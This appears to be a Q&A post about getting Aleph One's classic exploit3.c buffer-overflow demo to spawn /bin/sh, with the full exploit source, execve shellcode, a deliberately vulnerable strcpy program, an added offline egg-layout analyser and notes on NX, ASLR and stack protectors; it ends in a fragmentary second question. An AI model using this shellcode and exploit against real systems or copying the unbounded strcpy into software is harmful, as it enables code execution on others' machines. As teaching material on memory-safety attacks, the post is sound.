I am trying to overflow the buffer and run shellcode that executes /bin/sh.
For our buffer size, a good choice is about 100 bytes more than the size of the buffer we are trying to overflow. This places our code at the end of the buffer we are trying to overflow, leaving plenty of room for the NOPs, but still overwrites the return address with the address we guessed. The buffer we are trying to overflow is 512 bytes long, so we will use 612.
exploit3.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_OFFSET        0
#define DEFAULT_BUFFER_SIZE 512
#define NOP                0x90

/* execve("/bin/sh") shellcode from the paper: 45 bytes, no NUL bytes */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* current stack pointer: whatever is left in %eax is what the caller receives */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  /* guessed return address: our own stack pointer minus an optional offset */
  addr = get_sp() - offset;
  printf("Using address: 0x%lx\n", addr);

  /* 1. fill the whole buffer with copies of the guessed address */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* 2. turn the first half into a NOP sled */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* 3. put the shellcode in the middle, right after the sled */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  /* 4. export the buffer as $EGG and start a shell that inherits it */
  buff[bsize - 1] = '\0';
  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
vulnerable.c
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[]) {
  char xbuff[512];

  /* unbounded copy of argv[1] into a 512-byte stack buffer */
  if(argc >1)
    strcpy(xbuff, argv[1]);

  return 0;
}
The program runs, but /bin/sh is not invoked:
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$
The expected output is:
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$ exit
[aleph1]$
What is wrong?!
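The egg that exploit3.c builds can be checked on paper before anything is run. The following is an added example, not code from the original post or from Aleph One's paper: it rebuilds the egg exactly the way exploit3.c lays it out (the same shellcode bytes, used here only as data) and then reports where the NOP sled, the shellcode and the intact copies of the guessed address end up, and how many of those copies the strcpy in vulnerable.c would write past its 512-byte xbuff. The address 0xbffffdb4 is the one printed in the post and is only a placeholder; the names build_egg, inspect_egg, egg_layout_for and the struct egg_layout are this example's own.

```c
/* Added example: rebuild exploit3's egg and measure its layout offline.
 * Not part of the original post or of Aleph One's paper. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP        0x90
#define PREFIX_LEN 4        /* the "EGG=" that exploit3 writes over the start of buff */

/* Same 45 shellcode bytes as the post's exploit3.c, used purely as data here. */
static const char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

struct egg_layout {
    size_t sled_len;      /* NOP bytes between the start of the value and the shellcode */
    size_t shellcode_off; /* offset of the shellcode inside buff */
    size_t addr_copies;   /* intact, slot-aligned copies of addr after the shellcode */
    size_t copied_bytes;  /* bytes strcpy(xbuff, $EGG) copies, NUL included */
    size_t spill_bytes;   /* of those, how many land past the end of xbuff */
    size_t spill_copies;  /* intact copies of addr inside that spilled region */
};

/* Build an egg of bsize bytes the way exploit3.c does: every 4-byte slot =
 * addr, first half NOPs, shellcode centred on the middle, last byte NUL,
 * "EGG=" over the first four bytes. Returns a malloc'd buffer or NULL. */
unsigned char *build_egg(size_t bsize, uint32_t addr)
{
    size_t sclen = strlen(shellcode);
    if (bsize < sclen + 8)          /* no room for a sled, the code and the NUL */
        return NULL;
    unsigned char *buff = malloc(bsize);
    if (!buff)
        return NULL;
    for (size_t i = 0; i + 4 <= bsize; i += 4)   /* full slots only; exploit3's own loop can overrun */
        memcpy(buff + i, &addr, 4);              /* host byte order, little-endian on x86 */
    memset(buff, NOP, bsize / 2);
    memcpy(buff + bsize / 2 - sclen / 2, shellcode, sclen);
    buff[bsize - 1] = '\0';
    memcpy(buff, "EGG=", PREFIX_LEN);
    return buff;
}

/* Count intact copies of addr on 4-byte slot boundaries in buff[from, to). */
static size_t count_addr_copies(const unsigned char *buff, size_t from, size_t to, uint32_t addr)
{
    size_t n = 0;
    for (size_t off = (from + 3) & ~(size_t)3; off + 4 <= to; off += 4)
        if (memcmp(buff + off, &addr, 4) == 0)
            n++;
    return n;
}

/* Measure an egg built by build_egg against a target buffer of xbuff_size bytes. */
int inspect_egg(const unsigned char *buff, size_t bsize, uint32_t addr,
                size_t xbuff_size, struct egg_layout *out)
{
    size_t sclen = strlen(shellcode);
    if (bsize < sclen + 8)
        return -1;
    size_t sc_off = bsize / 2 - sclen / 2;
    if (memcmp(buff + sc_off, shellcode, sclen) != 0)   /* shellcode not where exploit3 puts it */
        return -1;
    out->shellcode_off = sc_off;
    out->sled_len = 0;
    for (size_t i = PREFIX_LEN; i < sc_off && buff[i] == NOP; i++)
        out->sled_len++;
    out->addr_copies = count_addr_copies(buff, sc_off + sclen, bsize, addr);
    /* strcpy stops at the first NUL, so an address containing a 0x00 byte truncates the copy */
    out->copied_bytes = strlen((const char *)buff + PREFIX_LEN) + 1;
    out->spill_bytes  = out->copied_bytes > xbuff_size ? out->copied_bytes - xbuff_size : 0;
    size_t spill_from = PREFIX_LEN + xbuff_size;
    out->spill_copies = spill_from < bsize ? count_addr_copies(buff, spill_from, bsize, addr) : 0;
    return 0;
}

/* Convenience: build, inspect, free. Returns 0 on success. */
int egg_layout_for(size_t bsize, uint32_t addr, size_t xbuff_size, struct egg_layout *out)
{
    unsigned char *egg = build_egg(bsize, addr);
    if (!egg)
        return -1;
    int rc = inspect_egg(egg, bsize, addr, xbuff_size, out);
    free(egg);
    return rc;
}

int main(int argc, char *argv[])
{
    size_t bsize = argc > 1 ? (size_t)atoi(argv[1]) : 612;   /* same argument as exploit3 */
    struct egg_layout l;
    if (egg_layout_for(bsize, 0xbffffdb4u, 512, &l) != 0) {
        fprintf(stderr, "an egg of %zu bytes cannot be built\n", bsize);
        return 1;
    }
    printf("bsize %zu: sled %zu bytes, shellcode at offset %zu, %zu intact address copies after it\n",
           bsize, l.sled_len, l.shellcode_off, l.addr_copies);
    printf("strcpy copies %zu bytes, %zu of them past xbuff, holding %zu address copies\n",
           l.copied_bytes, l.spill_bytes, l.spill_copies);
    return 0;
}
```

With 612 bytes the value of $EGG is 607 bytes plus the NUL, so strcpy writes 96 bytes past xbuff, and 23 intact copies of the guessed address lie in that region, every one of them at a 4-byte-aligned offset from the start of xbuff; the 280 NOPs in front of the shellcode are the tolerance the address guess gets. If the layout is right and the shell still does not appear, the usual reasons on a current Linux are that vulnerable's stack is not executable (readelf -lW ./vulnerable | grep GNU_STACK shows RW instead of RWE), that ASLR puts vulnerable's stack somewhere other than where exploit3's get_sp() was (/proc/sys/kernel/randomize_va_space is non-zero), or that vulnerable was built with a stack protector; both programs also have to be 32-bit builds (-m32) for this shellcode to make sense.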
Second question:
Why does exploit3.c run system("/bin/bash") at the end of main()? I am trying to overflow the buffer and run shellcode that executes /bin/sh. ...
exploit3
runs a shell at the end because it is here